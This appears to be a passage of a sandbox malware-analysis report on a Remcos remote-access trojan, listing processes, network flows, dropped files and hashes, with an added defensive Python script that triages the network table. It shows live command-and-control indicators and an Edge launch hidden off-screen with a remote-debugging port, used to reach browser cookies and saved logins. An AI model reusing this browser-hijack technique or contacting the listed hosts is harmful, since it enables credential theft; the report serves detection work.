--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffa39e746f8,0x7ffa39e74708,0x7ffa39e74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2140,4149677153436744321,2610656616709822569,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 dvlqrd8dhs.duckdns.org udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 245.20.216.154.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com udp
US 8.8.8.8:53 228.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.212.202:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 216.58.212.202:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
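Most rows in the table are noise: PTR lookups (in-addr.arpa) that the sandbox resolver performs for every address it sees, Google infrastructure reached while the payload was fetched from Drive, and mDNS. What remains is the Remcos picture: repeated TCP sessions to dvlqrd8dhs.duckdns.org at 154.216.20.245 on the non-standard port 46063 (the C2), one HTTP request to geoplugin.net (the geolocation lookup Remcos is known to make on start-up), and the loopback 127.0.0.1:9222 connections that consume the browsers' DevTools port opened in the process list above. The triage script below is an added example for this page, not part of the report; it parses a constructed subset of the rows above, and its dynamic-DNS and fingerprinting watchlists are assumptions chosen for the example:

```python
from collections import Counter

# Constructed sample: a subset of the Network rows from this report, copied as printed
# ("<country> <ip:port> [<domain>] <proto>"; rows without a domain have three fields).
SAMPLE_ROWS = """\
US 8.8.8.8:53 106.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 dvlqrd8dhs.duckdns.org udp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
US 154.216.20.245:46063 dvlqrd8dhs.duckdns.org tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
"""

# Analyst watchlists (assumptions for this example, not taken from the report).
DYNAMIC_DNS = (".duckdns.org", ".no-ip.org", ".no-ip.com", ".ddns.net", ".hopto.org")
FINGERPRINT_SERVICES = {"geoplugin.net"}   # geolocation lookup Remcos is known to make
EXPECTED_PORTS = {80, 443}


def parse_rows(text):
    """Turn the printed table into flow records."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        ip, port = parts[1].rsplit(":", 1)
        flows.append({"country": parts[0], "ip": ip, "port": int(port),
                      "domain": parts[2] if len(parts) == 4 else None, "proto": parts[-1]})
    return flows


def triage(text):
    """Collapse the table to per-endpoint findings and list names that only resolved."""
    flows = parse_rows(text)
    hits, meta, queried = Counter(), {}, set()
    for f in flows:
        if f["port"] == 53:                      # resolver traffic: keep the name, drop PTR noise
            if f["domain"] and not f["domain"].endswith(".in-addr.arpa"):
                queried.add(f["domain"])
            continue
        if f["ip"].startswith("224."):           # mDNS / multicast chatter
            continue
        key = (f["domain"] or f["ip"], f["ip"], f["port"])
        hits[key] += 1
        meta[key] = f
    findings = []
    for (name, ip, port), n in hits.items():
        reasons = []
        if ip.startswith("127."):
            reasons.append("loopback_devtools" if port == 9222 else "loopback")
        else:
            if port not in EXPECTED_PORTS:
                reasons.append("nonstandard_port")
            if name.endswith(DYNAMIC_DNS):
                reasons.append("dynamic_dns")
            if name in FINGERPRINT_SERVICES:
                reasons.append("fingerprint_service")
        if reasons:
            findings.append({"name": name, "ip": ip, "port": port,
                             "proto": meta[(name, ip, port)]["proto"],
                             "hits": n, "reasons": reasons})
    # strongest signal first: most reasons, then most sessions
    findings.sort(key=lambda f: (-len(f["reasons"]), -f["hits"]))
    connected = {k[0] for k in hits}
    return {"findings": findings, "dns_only": sorted(queried - connected)}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    for f in result["findings"]:
        print(f"{f['name']} {f['ip']}:{f['port']}/{f['proto']} x{f['hits']} {','.join(f['reasons'])}")
    print("resolved but never contacted:", result["dns_only"])
```

The dns_only list is empty for this sample because every non-PTR name was also contacted; on other detonations it is where a secondary C2 that failed to resolve, or a kill-switch domain, shows up. The loopback 9222 finding is only meaningful next to the browser launch in the process list, which is why it is reported separately rather than folded into the C2 score.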

Files

memory/964-4-0x00007FFA391D3000-0x00007FFA391D5000-memory.dmp

memory/964-5-0x0000019275F30000-0x0000019275F52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cgj1eocl.qbq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/964-15-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp

memory/964-16-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp

memory/964-18-0x00007FFA391D3000-0x00007FFA391D5000-memory.dmp

memory/964-19-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp

memory/964-21-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp

memory/964-24-0x00007FFA391D0000-0x00007FFA39C91000-memory.dmp

memory/536-25-0x0000000004F60000-0x0000000004F96000-memory.dmp

memory/536-26-0x0000000005730000-0x0000000005D58000-memory.dmp

memory/536-27-0x0000000005570000-0x0000000005592000-memory.dmp

memory/536-28-0x0000000005610000-0x0000000005676000-memory.dmp

memory/536-29-0x0000000005E10000-0x0000000005E76000-memory.dmp

memory/536-39-0x0000000005F80000-0x00000000062D4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2d74f3420d97c3324b6032942f3a9fa7
SHA1 95af9f165ffc370c5d654a39d959a8c4231122b9
SHA256 8937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d
SHA512 3c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a

memory/536-41-0x0000000006520000-0x000000000653E000-memory.dmp

memory/536-42-0x0000000006570000-0x00000000065BC000-memory.dmp

memory/536-43-0x0000000007D80000-0x00000000083FA000-memory.dmp

memory/536-44-0x0000000006AE0000-0x0000000006AFA000-memory.dmp

memory/536-45-0x00000000077A0000-0x0000000007836000-memory.dmp

memory/536-46-0x0000000007740000-0x0000000007762000-memory.dmp

memory/536-47-0x00000000089B0000-0x0000000008F54000-memory.dmp

C:\Users\Admin\AppData\Roaming\Borgerrettighed.Pol

MD5 151088b8801ce6d8e7d768186846b8fb
SHA1 d83dcf54fb5da27a4f0223722bd1d4ceb29eebc6
SHA256 d96005febe8ec22af04cc0e3f8997d59e46decbdc87885b3a3a085baeb26febe
SHA512 4a9255b3439225a919c512b355e6646195c30e22bdcc7f9512d73bb915ff97c44246fa1e93719e3d283515fd383ff72d753cf0ce16c26a78646147510a46ceed

memory/536-49-0x0000000008F60000-0x000000000A4AC000-memory.dmp

memory/2024-62-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-63-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-67-0x000000001F680000-0x000000001F6B4000-memory.dmp

memory/2024-70-0x000000001F680000-0x000000001F6B4000-memory.dmp

memory/2024-71-0x000000001F680000-0x000000001F6B4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 7daacfb1893083397ae4baf6b0e96d27
SHA1 d96add6847097d7c933081a4381ec80409879339
SHA256 6b7ed34ae75a2937acd76242b26f9d6fda9aa75a9a43379bf638079f3a0cb778
SHA512 f5cb2ff8baf149787dab2777945a67f016aa410bcb88d3065a7f7ca4c3b689e56410d56d43bba90afab40fcf161dfc4506885662f77494f1ce0d45e7f989e4f5

memory/2524-80-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2524-83-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2524-86-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4664-94-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4664-93-0x0000000000400000-0x0000000000424000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 ee283aec39f062fb5b04d8cd640b20d9
SHA1 fa0138102e77c66c01ef6c39c21f6191e1fad4ea
SHA256 27b9348d313f1f4c266a5237153a824005630d2daf6270423833775190d1f84d
SHA512 72c07679cc5bdc8e95682b76e8c2a74d2d899e15ceebbc3cd61c59fe2b1eb198e947923dfecacec21c7d36855cc78e064304e4ad578bc7f0503f9f1b412f1ed3

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 201fa205707c48fcee92326e5894e567
SHA1 ada346a5ef114e5a831563ace50c6650667b23f7
SHA256 f122d839832c9b9f4feed61b2f5d5f1165d8f29a5563580fe6af3550113aa959
SHA512 48701c66064274e0d0e62c190fb12fce104ddb795006662318c6560a956d7444ec3c81e6149a04c48ae7007cea6458d7da1fd6ab37130c2763fd88210f957242

\??\pipe\crashpad_1868_RIRXEZIZCDXUTLIC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4664-88-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1416-84-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1416-87-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2524-81-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1416-85-0x0000000000400000-0x0000000000462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000001.dbtmp

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GrShaderCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GrShaderCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GrShaderCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GrShaderCache\data_0

MD5 c553478d923929afe416481f2d97cb77
SHA1 0890e76895ed93570d9a7fdec87180fd98d19ac0
SHA256 f7a7003f6b3c09ccc32b38d349af658b052fd0bf4a808c0d0e2a08e73c4ed9e1
SHA512 db64e48770058b98493d394f2a1b9f7678b88a9c16f9f420894b9964973dffc48f71c9a2e825b52026fd9c280e1dc9fd0df06960002bed3f5bdad4179a5d1c54

memory/2024-200-0x000000001F500000-0x000000001F519000-memory.dmp

memory/2024-199-0x000000001F500000-0x000000001F519000-memory.dmp

memory/2024-196-0x000000001F500000-0x000000001F519000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\euyomxdaaormfgjg

MD5 60a0bdc1cf495566ff810105d728af4a
SHA1 243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6
SHA256 fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2
SHA512 4445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/2024-223-0x0000000001000000-0x0000000002254000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 f646574007ca9fc07e97d74db2c81605
SHA1 ca584a2a904c52fd679b85cdf756118f7729b526
SHA256 07fd4ab98a7c4619a6654a3c5fb58e9bf50ef614b6d0b08273af70f3343cf127
SHA512 2dd465b42976a1d2cdae5833747c71c3785accb8fef02b7f6c6e2c1f887a2f16a6589c4645306236044e0e8f3053c81007be8f12600316855c635a36cc608b36

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 dc2c344d4ec76a44b1616f7e91eeaea9
SHA1 4b888988378d7271c2bb4b947936076b2beedda8
SHA256 ed6fc9ed5a8a1732244fb25d04f597f9402e5435b4fb4879b4399c5dfc1d54e8
SHA512 98c6b351bf6461055f616fa8b4bbb5461c4cfeb567763399a8f7b6dd537767fc604d0925529af796a40fdec270ae5b3adda633c6bff5abff3620aab26c3a03f1

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 5ae8b9f62f171ef8540cded87da79065
SHA1 e3c8be49d8d726574c4b7b0b928797c67928e754
SHA256 152c7689ca943931226b2fd8cb94d2e81f9c20b8a98485e7f142cf7125b9143d
SHA512 12bbe7c09d4d55c9399a88e6c526f5423c947411c6feae540a06af4d78a20db614b05f2222b8e79b0ea770647d4bc0d7c9f3f4e6bbaf9596ad417846fad3f61d

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 6cc2eda1b8da7a641b468b75f98c71de
SHA1 76f32e5896a9e27f5ed6b10d7dc2040dc93c8495
SHA256 f9202561a19e222bc71943b191bc7d1a2a4f6e37ceaeeeb2242fe0500cfd768f
SHA512 d6add86ec128322cff2d9f7a2f0077064422f5711403e9e232b04dd9ed06e8262e7e287a033cd65fe5a40b9381a4b14299e898830a33b2d05fadd94dbcc88c4d

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

MD5 9725deafd080c5d20c9253ba082a6ff3
SHA1 daec7cbe4a70e7d774e358225085a17e2d6622c4
SHA256 206519a18145604873f71cce161f3144cdd18590064c7efe688d629c9f9828cf
SHA512 2c3787b398874713db4ea5b5cee27e1e57381f6e1211051b5ce3469303dd0183da8de88b0c867490de1bb74112cc5004714f9783fd4b0349687f535460f4507a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

MD5 b6ba05bececb79216b349f574d355ac8
SHA1 29e4957cea326434404b1d0768a36013fd4a4089
SHA256 bacb01da141ba7bc03a9fdb013d54c2c12155e8719139a9747930c930ac42dad
SHA512 a5532b8e7e3cc9ff63dea71b4ff81c9bbab27a9f426f6cb471210f6df9eb48640910713aeda557272cbe310c2db4ff6fe7c01ee6e24331598e5121771c9872c6

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

MD5 a11275e628c0a4bbdc704e726d43eadf
SHA1 2eb4ac546061d6bf121940d9f877c87fc880f6ab
SHA256 c27b012422a447f16cc2ac29df9b02be821de6dd76300c8fb68c0753dbf1642b
SHA512 9a4e7f0c8db5722d611eb94f62c78446a4f6a474bcf286e0a3973c025029e871be45288cd2e0a39c31c6aca549f7079bde47e9947ba356996cd9866e44f2a896

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

memory/2024-370-0x0000000001000000-0x0000000002254000-memory.dmp

C:\ProgramData\remcos\logs.dat

memory/2024-376-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-379-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-382-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-385-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-388-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-391-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-394-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-406-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-409-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-412-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-415-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-418-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-421-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-433-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-436-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-439-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-442-0x0000000001000000-0x0000000002254000-memory.dmp

memory/2024-445-0x0000000001000000-0x0000000002254000-memory.dmp